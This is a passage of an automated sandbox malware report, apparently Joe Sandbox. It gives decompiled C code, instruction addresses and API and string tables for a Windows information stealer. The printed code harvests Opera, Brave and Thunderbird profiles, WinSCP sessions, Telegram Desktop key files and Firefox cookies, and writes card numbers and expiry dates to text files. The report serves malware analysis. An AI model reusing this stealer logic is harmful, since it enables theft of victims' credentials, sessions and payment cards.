                                                                                							_push(_v576);
                                                                                							E0041EAA2(_t86, _t108, _t114, _t131);
                                                                                						}
                                                                                					}
                                                                                					 *0x44a078(_v572);
                                                                                					 *0x44a0a8(_v580);
                                                                                				}
                                                                                				return E0041DEB4(DeleteFileA( &_v276), _t86, _v8 ^ _t117, _t107, _t108, _t114);
                                                                                			}




































                                                                                0x00410130
                                                                                0x00410139
                                                                                0x00410140
                                                                                0x00410146
                                                                                0x00410151
                                                                                0x0041015b
                                                                                0x0041016e
                                                                                0x00410170
                                                                                0x00410172
                                                                                0x00410184
                                                                                0x00410194
                                                                                0x004101a4
                                                                                0x004101bf
                                                                                0x004101c5
                                                                                0x004101d9
                                                                                0x004101df
                                                                                0x004101e4
                                                                                0x004101fb
                                                                                0x00410201
                                                                                0x00410206
                                                                                0x00410218
                                                                                0x0041021f
                                                                                0x00410227
                                                                                0x00410233
                                                                                0x0041034b
                                                                                0x0041034b
                                                                                0x0041034e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00410247
                                                                                0x00410257
                                                                                0x00410265
                                                                                0x00410267
                                                                                0x00410279
                                                                                0x0041027b
                                                                                0x00410283
                                                                                0x0041028f
                                                                                0x00410295
                                                                                0x004102a1
                                                                                0x004102ab
                                                                                0x004102b7
                                                                                0x004102c1
                                                                                0x004102f5
                                                                                0x004102f7
                                                                                0x004102fd
                                                                                0x00410302
                                                                                0x00410307
                                                                                0x00410315
                                                                                0x00410317
                                                                                0x00410317
                                                                                0x00410319
                                                                                0x00410327
                                                                                0x00410337
                                                                                0x00410342
                                                                                0x00410348
                                                                                0x00410348
                                                                                0x00410354
                                                                                0x0041035a
                                                                                0x0041035f
                                                                                0x00410227
                                                                                0x00410366
                                                                                0x00410373
                                                                                0x00410379
                                                                                0x00410395

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fprintf$File$CopyCurrentDeleteDirectory__fsopen_memsetlstrcatwsprintf
                                                                                • String ID: CC\%s_%s.txt$Card: %s$Month: %s$Name: %s$Year: %s$\temp$hC
                                                                                • API String ID: 913535830-1724484930
                                                                                • Opcode ID: 0472216ae950bef9f06fa0b72c1dcd568f50c42a88198bff33d8fe9cc0220aae
                                                                                • Instruction ID: 550820abe71679d22812363b38ab829dcd7c1cdab965256f1e9672bcda8c65da
                                                                                • Opcode Fuzzy Hash: 0472216ae950bef9f06fa0b72c1dcd568f50c42a88198bff33d8fe9cc0220aae
                                                                                • Instruction Fuzzy Hash: CD51B235D40218ABDB21AB25DC4EBDA7778EF05314F1400AAF909B21A1DB799ED4CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 46%
                                                                                			E00413F3C(void* __edx, intOrPtr* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                				signed int _v8;
                                                                                				char _v276;
                                                                                				char _v304;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				signed int _t24;
                                                                                				intOrPtr _t67;
                                                                                				intOrPtr _t68;
                                                                                				CHAR* _t71;
                                                                                				void* _t91;
                                                                                				intOrPtr _t95;
                                                                                				intOrPtr _t96;
                                                                                				intOrPtr _t97;
                                                                                				intOrPtr _t98;
                                                                                				intOrPtr _t99;
                                                                                				intOrPtr _t100;
                                                                                				intOrPtr _t101;
                                                                                				intOrPtr _t102;
                                                                                				intOrPtr _t103;
                                                                                				intOrPtr _t104;
                                                                                				intOrPtr _t105;
                                                                                				intOrPtr _t106;
                                                                                				intOrPtr _t107;
                                                                                				intOrPtr _t108;
                                                                                				intOrPtr _t109;
                                                                                				intOrPtr _t110;
                                                                                				intOrPtr _t111;
                                                                                				intOrPtr _t112;
                                                                                				intOrPtr _t113;
                                                                                				intOrPtr _t114;
                                                                                				intOrPtr _t115;
                                                                                				intOrPtr _t116;
                                                                                				intOrPtr _t117;
                                                                                				intOrPtr _t118;
                                                                                				intOrPtr _t119;
                                                                                				intOrPtr _t120;
                                                                                				void* _t134;
                                                                                				intOrPtr _t135;
                                                                                				intOrPtr _t136;
                                                                                				intOrPtr _t137;
                                                                                				intOrPtr _t138;
                                                                                				intOrPtr _t139;
                                                                                				intOrPtr _t140;
                                                                                				intOrPtr* _t143;
                                                                                				signed int _t144;
                                                                                
                                                                                				_t148 = __eflags;
                                                                                				_t143 = __esi;
                                                                                				_t133 = __edx;
                                                                                				_t24 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t24 ^ _t144;
                                                                                				 *((intOrPtr*)(__esi + 0x28)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x24)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x34)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x30)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x38)) = 0;
                                                                                				E00413E43(_t134, __esi, __eflags, _a4, _a8);
                                                                                				_push(E00420300( *0x449f3c, "w"));
                                                                                				E0041EAA2(_t91, _t134, __esi, _t148);
                                                                                				_t135 =  *0x449e38; // 0x14a10f8
                                                                                				_t92 = __esi;
                                                                                				E00413D67(__esi, __edx, _t135, _t148,  *0x449f60);
                                                                                				_t136 =  *0x449c30; // 0x14983a0
                                                                                				E00413D67(__esi, __edx, _t136, _t148,  *0x449e0c);
                                                                                				_t137 =  *0x449e54; // 0x147f4e8
                                                                                				E00413D67(__esi, __edx, _t137, _t148,  *0x449d94);
                                                                                				_t138 =  *0x449e34; // 0x146fa10
                                                                                				E00413D67(_t92, _t133, _t138, _t148,  *0x449cc8);
                                                                                				_t139 =  *0x449fa0; // 0x1498410
                                                                                				E00413D67(_t92, _t133, _t139, _t148,  *0x449eac);
                                                                                				_t140 =  *0x449de4; // 0x14a1120
                                                                                				E00413D67(_t92, _t133, _t140, _t148,  *0x449b74);
                                                                                				_t141 =  *0x449d40; // 0x14f13c0
                                                                                				E00413D67(_t92, _t133, _t141, _t148,  *0x449efc);
                                                                                				_push("\\Opera Stable\\");
                                                                                				_push( *0x449d6c);
                                                                                				_push(__esi);
                                                                                				E004139E8(_t92, _t133, _t141, __esi, _t148);
                                                                                				_push("\\Opera GX Stable\\");
                                                                                				_push( *0x449d7c);
                                                                                				_push(_t143);
                                                                                				E004139E8(_t92, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449dc4);
                                                                                				_t95 =  *0x449d88; // 0x14a0e28
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t95, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449c64);
                                                                                				_t96 =  *0x449f44; // 0x147f3e8
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t96, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449cb4);
                                                                                				_t97 =  *0x449bb0; // 0x147f5c8
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t97, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449e64);
                                                                                				_t98 =  *0x449c44; // 0x147f468
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t98, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449dc8);
                                                                                				_t99 =  *0x449e04; // 0x147f408
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t99, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449ecc);
                                                                                				_t100 =  *0x449d64; // 0x147f668
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t100, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449ddc);
                                                                                				_t101 =  *0x44a01c; // 0x147f5e8
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t101, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449f98);
                                                                                				_t102 =  *0x449b8c; // 0x14a0f18
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t102, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449ca0);
                                                                                				_t103 =  *0x449b68; // 0x147f688
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t103, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449da4);
                                                                                				_t104 =  *0x449d38; // 0x147f488
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t104, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449b5c);
                                                                                				_t105 =  *0x449b70; // 0x147f4c8
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t105, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449f10);
                                                                                				_t106 =  *0x449db0; // 0x146f6b0
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t106, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449b94);
                                                                                				_t107 =  *0x449ee8; // 0x14a1148
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t107, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449fb8);
                                                                                				_t108 =  *0x449dc0; // 0x14a1058
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t108, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449e80);
                                                                                				_t109 =  *0x449d14; // 0x1455dc0
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t109, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449dac);
                                                                                				_t110 =  *0x449c7c; // 0x14f09c0
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t110, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449c28);
                                                                                				_t111 =  *0x449c88; // 0x14f1650
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t111, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449da0);
                                                                                				_t112 =  *0x449e10; // 0x14f17b0
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t112, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449e1c);
                                                                                				_t113 =  *0x449ec0; // 0x14a0e78
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t113, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449fb4);
                                                                                				_t114 =  *0x449ba0; // 0x14f14f0
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t114, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449bc0);
                                                                                				_t115 =  *0x449b60; // 0x14f1630
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t115, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449fe0);
                                                                                				_t116 =  *0x449f7c; // 0x14a0f68
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t116, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449bb8);
                                                                                				_t117 =  *0x449c18; // 0x14f1730
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t117, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x44a028);
                                                                                				_t118 =  *0x449ea4; // 0x14a0f90
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t118, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449c08);
                                                                                				_t119 =  *0x449eb4; // 0x14a1198
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t119, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449f70);
                                                                                				_t120 =  *0x449b64; // 0x14a0e50
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t120, _t133, _t141, _t143, _t148);
                                                                                				_push("CryptoTab Browser");
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, "\\CryptoTab Browser\\User Data\\", _t133, _t141, _t143, _t148);
                                                                                				_push("Brave");
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, "\\BraveSoftware\\Brave-Browser\\User Data\\", _t133, _t141, _t143, _t148);
                                                                                				_t93 = 0;
                                                                                				_t149 =  *_t143;
                                                                                				if( *_t143 != 0) {
                                                                                					_t132 = _t143;
                                                                                					E004118A4(0, _t143, _t133, _t141, _t143, _t149);
                                                                                					_t150 =  *_t143;
                                                                                					if( *_t143 != 0) {
                                                                                						E004126BD(0, _t132, _t133, _t141, _t143, _t150);
                                                                                						E004112DA(0, _t132, _t133, _t141, _t143, _t150);
                                                                                						_t141 = "\\Thunderbird\\Profiles\\";
                                                                                						E00413D67(_t143, _t133, "\\Thunderbird\\Profiles\\", _t150, "Thunderbird");
                                                                                						_t93 = 0;
                                                                                					}
                                                                                				}
                                                                                				_t152 =  *((intOrPtr*)(_t143 + 5)) - _t93;
                                                                                				if( *((intOrPtr*)(_t143 + 5)) != _t93) {
                                                                                					_push( *0x449bb4);
                                                                                					_t142 = _t143 + 8;
                                                                                					_push( &_v304);
                                                                                					_t71 = E0040D337(_t93, _t143 + 8, _t143, _t152);
                                                                                					_t153 = _t71[0x14] - 0x10;
                                                                                					if(_t71[0x14] >= 0x10) {
                                                                                						_t71 =  *_t71;
                                                                                					}
                                                                                					CreateDirectoryA(_t71, _t93);
                                                                                					E00402C34( &_v304, 1, _t93);
                                                                                					E00427E30( &_v276, _t93, 0x104);
                                                                                					 *0x44a1b8( &_v276, E0041F644(_t93, _t142, _t143, _t153), "APPDATA");
                                                                                					 *0x44a1b8( &_v276, "\\Telegram Desktop\\");
                                                                                					_push("key_datas");
                                                                                					_push( &_v276);
                                                                                					_t141 = 0x43e028;
                                                                                					_push(0x43e028);
                                                                                					E00411E67(_t93, _t143, 0x43e028, _t143, _t153);
                                                                                					_push("D877F783D5D3EF8C*");
                                                                                					_push( &_v276);
                                                                                					_push(0x43e028);
                                                                                					E00411E67(_t93, _t143, 0x43e028, _t143, _t153);
                                                                                					_push("map*");
                                                                                					_push( &_v276);
                                                                                					_push(0x43e028);
                                                                                					E00411E67(_t93, _t143, 0x43e028, _t143, _t153);
                                                                                				}
                                                                                				_t67 =  *0x44a08c; // 0x0
                                                                                				 *((intOrPtr*)(_t143 + 0x28)) = _t67;
                                                                                				_t68 =  *0x44a098; // 0x0
                                                                                				 *((intOrPtr*)(_t143 + 0x2c)) = _t68;
                                                                                				return E0041DEB4(_t68, _t93, _v8 ^ _t144, _t133, _t141, _t143);
                                                                                			}

















































                                                                                0x00413f3c
                                                                                0x00413f3c
                                                                                0x00413f3c
                                                                                0x00413f45
                                                                                0x00413f4c
                                                                                0x00413f59
                                                                                0x00413f5c
                                                                                0x00413f5f
                                                                                0x00413f62
                                                                                0x00413f65
                                                                                0x00413f68
                                                                                0x00413f6b
                                                                                0x00413f80
                                                                                0x00413f81
                                                                                0x00413f86
                                                                                0x00413f95
                                                                                0x00413f97
                                                                                0x00413fa2
                                                                                0x00413fa8
                                                                                0x00413fb3
                                                                                0x00413fb9
                                                                                0x00413fc4
                                                                                0x00413fca
                                                                                0x00413fd5
                                                                                0x00413fdb
                                                                                0x00413fe6
                                                                                0x00413fec
                                                                                0x00413ff7
                                                                                0x00413ffd
                                                                                0x00414002
                                                                                0x00414007
                                                                                0x0041400d
                                                                                0x0041400e
                                                                                0x00414013
                                                                                0x00414018
                                                                                0x0041401e
                                                                                0x0041401f
                                                                                0x00414024
                                                                                0x0041402a
                                                                                0x00414030
                                                                                0x00414031
                                                                                0x00414036
                                                                                0x0041403c
                                                                                0x00414042
                                                                                0x00414043
                                                                                0x00414048
                                                                                0x0041404e
                                                                                0x00414054
                                                                                0x00414055
                                                                                0x0041405a
                                                                                0x00414060
                                                                                0x00414066
                                                                                0x00414067
                                                                                0x0041406c
                                                                                0x00414072
                                                                                0x00414078
                                                                                0x00414079
                                                                                0x0041407e
                                                                                0x00414084
                                                                                0x0041408a
                                                                                0x0041408b
                                                                                0x00414090
                                                                                0x00414096
                                                                                0x0041409c
                                                                                0x0041409d
                                                                                0x004140a2
                                                                                0x004140a8
                                                                                0x004140ae
                                                                                0x004140af
                                                                                0x004140b4
                                                                                0x004140ba
                                                                                0x004140c0
                                                                                0x004140c1
                                                                                0x004140c6
                                                                                0x004140cc
                                                                                0x004140d2
                                                                                0x004140d3
                                                                                0x004140d8
                                                                                0x004140de
                                                                                0x004140e4
                                                                                0x004140e5
                                                                                0x004140ea
                                                                                0x004140f0
                                                                                0x004140f6
                                                                                0x004140f7
                                                                                0x004140fc
                                                                                0x00414102
                                                                                0x00414108
                                                                                0x00414109
                                                                                0x0041410e
                                                                                0x00414114
                                                                                0x0041411a
                                                                                0x0041411b
                                                                                0x00414120
                                                                                0x00414126
                                                                                0x0041412c
                                                                                0x0041412d
                                                                                0x00414132
                                                                                0x00414138
                                                                                0x0041413e
                                                                                0x0041413f
                                                                                0x00414144
                                                                                0x0041414a
                                                                                0x00414150
                                                                                0x00414151
                                                                                0x00414156
                                                                                0x0041415c
                                                                                0x00414162
                                                                                0x00414163
                                                                                0x00414168
                                                                                0x0041416e
                                                                                0x00414174
                                                                                0x00414175
                                                                                0x0041417a
                                                                                0x00414180
                                                                                0x00414186
                                                                                0x00414187
                                                                                0x0041418c
                                                                                0x00414192
                                                                                0x00414198
                                                                                0x00414199
                                                                                0x0041419e
                                                                                0x004141a4
                                                                                0x004141aa
                                                                                0x004141ab
                                                                                0x004141b0
                                                                                0x004141b6
                                                                                0x004141bc
                                                                                0x004141bd
                                                                                0x004141c2
                                                                                0x004141c8
                                                                                0x004141ce
                                                                                0x004141cf
                                                                                0x004141d4
                                                                                0x004141da
                                                                                0x004141e0
                                                                                0x004141e1
                                                                                0x004141e6
                                                                                0x004141ec
                                                                                0x004141f2
                                                                                0x004141f3
                                                                                0x004141f8
                                                                                0x004141fd
                                                                                0x00414203
                                                                                0x00414208
                                                                                0x0041420d
                                                                                0x00414213
                                                                                0x00414218
                                                                                0x0041421a
                                                                                0x0041421c
                                                                                0x0041421e
                                                                                0x00414220
                                                                                0x00414225
                                                                                0x00414227
                                                                                0x00414229
                                                                                0x0041422e
                                                                                0x00414238
                                                                                0x0041423f
                                                                                0x00414244
                                                                                0x00414244
                                                                                0x00414227
                                                                                0x00414246
                                                                                0x00414249
                                                                                0x0041424f
                                                                                0x0041425b
                                                                                0x0041425e
                                                                                0x0041425f
                                                                                0x00414264
                                                                                0x0041426a
                                                                                0x0041426c
                                                                                0x0041426c
                                                                                0x00414270
                                                                                0x0041427f
                                                                                0x00414291
                                                                                0x004142ac
                                                                                0x004142be
                                                                                0x004142c4
                                                                                0x004142cf
                                                                                0x004142d0
                                                                                0x004142d5
                                                                                0x004142d8
                                                                                0x004142dd
                                                                                0x004142e8
                                                                                0x004142e9
                                                                                0x004142ec
                                                                                0x004142f1
                                                                                0x004142fc
                                                                                0x004142fd
                                                                                0x00414300
                                                                                0x00414300
                                                                                0x00414305
                                                                                0x0041430d
                                                                                0x00414310
                                                                                0x00414318
                                                                                0x00414322

                                                                                APIs
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                  • Part of subcall function 00413D67: _memset.LIBCMT ref: 00413D93
                                                                                  • Part of subcall function 00413D67: _memset.LIBCMT ref: 00413DA5
                                                                                  • Part of subcall function 00413D67: lstrcat.KERNEL32(?,014A10F8), ref: 00413DC4
                                                                                  • Part of subcall function 00413D67: lstrcat.KERNEL32(?,?), ref: 00413DD8
                                                                                  • Part of subcall function 00413D67: lstrcat.KERNEL32(?,..\profiles.ini), ref: 00413DEA
                                                                                  • Part of subcall function 00413D67: GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?), ref: 00413DF7
                                                                                  • Part of subcall function 00413D67: FreeLibrary.KERNEL32(?,?,?,?,?,?), ref: 00413E2E
                                                                                  • Part of subcall function 004139E8: __EH_prolog3_GS.LIBCMT ref: 004139F2
                                                                                  • Part of subcall function 004139E8: _memset.LIBCMT ref: 00413A2E
                                                                                  • Part of subcall function 004139E8: _memset.LIBCMT ref: 00413A3F
                                                                                  • Part of subcall function 004139E8: lstrcat.KERNEL32(?,\Opera Software\), ref: 00413A63
                                                                                  • Part of subcall function 004139E8: lstrcat.KERNEL32(?,?), ref: 00413A76
                                                                                  • Part of subcall function 004139E8: StrCmpCA.SHLWAPI(?,\Opera Stable\,?,?,?,00414013,?,\Opera Stable\,?,?,?,?,00000000), ref: 00413A8D
                                                                                  • Part of subcall function 004139E8: StrCmpCA.SHLWAPI(?,\Opera GX Stable\,?,?,?,00414013,?,\Opera Stable\,?,?,?,?,00000000), ref: 00413AAC
                                                                                  • Part of subcall function 004139E8: lstrcat.KERNEL32(?,\Opera Software\), ref: 00413AD7
                                                                                  • Part of subcall function 004139E8: _memset.LIBCMT ref: 00413AE6
                                                                                  • Part of subcall function 004139E8: lstrcat.KERNEL32(?,?), ref: 00413AFC
                                                                                  • Part of subcall function 004139E8: lstrcat.KERNEL32(?,\Local State), ref: 00413B0E
                                                                                  • Part of subcall function 004139E8: GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00413B6D
                                                                                  • Part of subcall function 004137F9: __EH_prolog3_GS.LIBCMT ref: 00413803
                                                                                  • Part of subcall function 004137F9: _memset.LIBCMT ref: 00413838
                                                                                  • Part of subcall function 004137F9: lstrcat.KERNEL32(?), ref: 00413857
                                                                                  • Part of subcall function 004137F9: _memset.LIBCMT ref: 00413866
                                                                                  • Part of subcall function 004137F9: lstrcat.KERNEL32(?,?), ref: 0041387C
                                                                                  • Part of subcall function 004137F9: lstrcat.KERNEL32(?,00440C98), ref: 0041388E
                                                                                  • Part of subcall function 004137F9: lstrcat.KERNEL32(?), ref: 004138A1
                                                                                  • Part of subcall function 004137F9: GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00413900
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,Brave,?,CryptoTab Browser,?,?,?,?,?,?,?,?,?,?,?), ref: 00414270
                                                                                • _memset.LIBCMT ref: 00414291
                                                                                • __wgetenv.LIBCMT ref: 0041429E
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004142AC
                                                                                • lstrcat.KERNEL32(?,\Telegram Desktop\), ref: 004142BE
                                                                                  • Part of subcall function 004118A4: __EH_prolog3_GS.LIBCMT ref: 004118AE
                                                                                  • Part of subcall function 004118A4: __wgetenv.LIBCMT ref: 004118C0
                                                                                  • Part of subcall function 004118A4: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,\Opera GX Stable\,?,\Opera Stable\,?,?,?,?,00000000), ref: 0041196E
                                                                                  • Part of subcall function 004118A4: CreateDirectoryA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,00000000), ref: 00411995
                                                                                  • Part of subcall function 004126BD: __EH_prolog3_GS.LIBCMT ref: 004126C7
                                                                                  • Part of subcall function 004126BD: _memset.LIBCMT ref: 004126E7
                                                                                  • Part of subcall function 004126BD: _memset.LIBCMT ref: 0041270D
                                                                                  • Part of subcall function 004126BD: _memset.LIBCMT ref: 00412724
                                                                                  • Part of subcall function 004126BD: _memset.LIBCMT ref: 0041273B
                                                                                  • Part of subcall function 004126BD: RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?), ref: 0041276D
                                                                                  • Part of subcall function 004126BD: RegGetValueW.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?,?,?,?,?,?,?,?,00000000,000003FF), ref: 0041279C
                                                                                  • Part of subcall function 004126BD: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?,\Opera Stable\), ref: 004127B4
                                                                                  • Part of subcall function 004126BD: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?,\Opera Stable\), ref: 004127D6
                                                                                  • Part of subcall function 004126BD: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?,\Opera Stable\), ref: 004127F0
                                                                                  • Part of subcall function 004126BD: RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?), ref: 0041280C
                                                                                  • Part of subcall function 004126BD: RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00412833
                                                                                  • Part of subcall function 004112DA: __EH_prolog3_GS.LIBCMT ref: 004112E4
                                                                                  • Part of subcall function 004112DA: GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,\Opera Stable\,?,?,?,?,00000000), ref: 00411342
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$_memset$H_prolog3_$AttributesFile$CloseCreateDirectory$Open__wgetenv$EnumFreeLibraryValue__fsopen
                                                                                • String ID: (C$APPDATA$Brave$CryptoTab Browser$D877F783D5D3EF8C*$Thunderbird$\BraveSoftware\Brave-Browser\User Data\$\CryptoTab Browser\User Data\$\Opera GX Stable\$\Opera Stable\$\Telegram Desktop\$\Thunderbird\Profiles\$key_datas$map*
                                                                                • API String ID: 427378461-2264012513
                                                                                • Opcode ID: 004eba26986d889edde72328b28cdcc458ef68f0c4da6b7fafd52e41a136ae5e
                                                                                • Instruction ID: e62858a9285edcc07832d07c2c104f7599a17e1253ef58cd06f48dcf41d5a719
                                                                                • Opcode Fuzzy Hash: 004eba26986d889edde72328b28cdcc458ef68f0c4da6b7fafd52e41a136ae5e
                                                                                • Instruction Fuzzy Hash: 6B915EBD500510ABCB05EF61ED82CDB377ABB4B305750402EF521522A2DF792E91EB9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,(>A(C,?), ref: 00410A2E
                                                                                • lstrcat.KERNEL32(?,\temp), ref: 00410A40
                                                                                • CopyFileA.KERNEL32 ref: 00410A50
                                                                                • _memset.LIBCMT ref: 00410A5D
                                                                                • wsprintfA.USER32 ref: 00410A6F
                                                                                • DeleteFileA.KERNEL32(?), ref: 00410BF9
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                • StrCmpCA.SHLWAPI(00000000,00440C64), ref: 00410B4A
                                                                                • lstrcat.KERNEL32(00000000,FALSE), ref: 00410B66
                                                                                • StrCmpCA.SHLWAPI(?,00440C64), ref: 00410B71
                                                                                • lstrcat.KERNEL32(?,FALSE), ref: 00410B8D
                                                                                • _fprintf.LIBCMT ref: 00410BAE
                                                                                • _fprintf.LIBCMT ref: 00410BBB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memsetwsprintf
                                                                                • String ID: %s%s%s%s%s%s%s$(>A(C$Cookies\%s_%s.txt$FALSE$SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies$TRUE$\temp
                                                                                • API String ID: 3836584492-4065151876
                                                                                • Opcode ID: 62140644920e53098d55f411989acb5e5721357ba7e37a48b30fe07a6ec2e481
                                                                                • Instruction ID: e50756961954b06cde412c856eb40ff3872ee28e5f922a0ee226e980f5d0c950
                                                                                • Opcode Fuzzy Hash: 62140644920e53098d55f411989acb5e5721357ba7e37a48b30fe07a6ec2e481
                                                                                • Instruction Fuzzy Hash: 09515D35940318AFEF219FF0DC49EDEBB79EF09704F100026F609AB160DB7999A48B19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 23%
                                                                                			E0040ED7D(char* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t32;
                                                                                				void* _t37;
                                                                                				void* _t44;
                                                                                				char* _t57;
                                                                                				void* _t63;
                                                                                				void* _t67;
                                                                                				void* _t69;
                                                                                				void* _t70;
                                                                                				void* _t71;
                                                                                				char* _t73;
                                                                                				void* _t74;
                                                                                				void* _t75;
                                                                                				signed int _t77;
                                                                                				void* _t79;
                                                                                
                                                                                				_t67 = __edx;
                                                                                				_t77 = _t79 - 0x6a10;
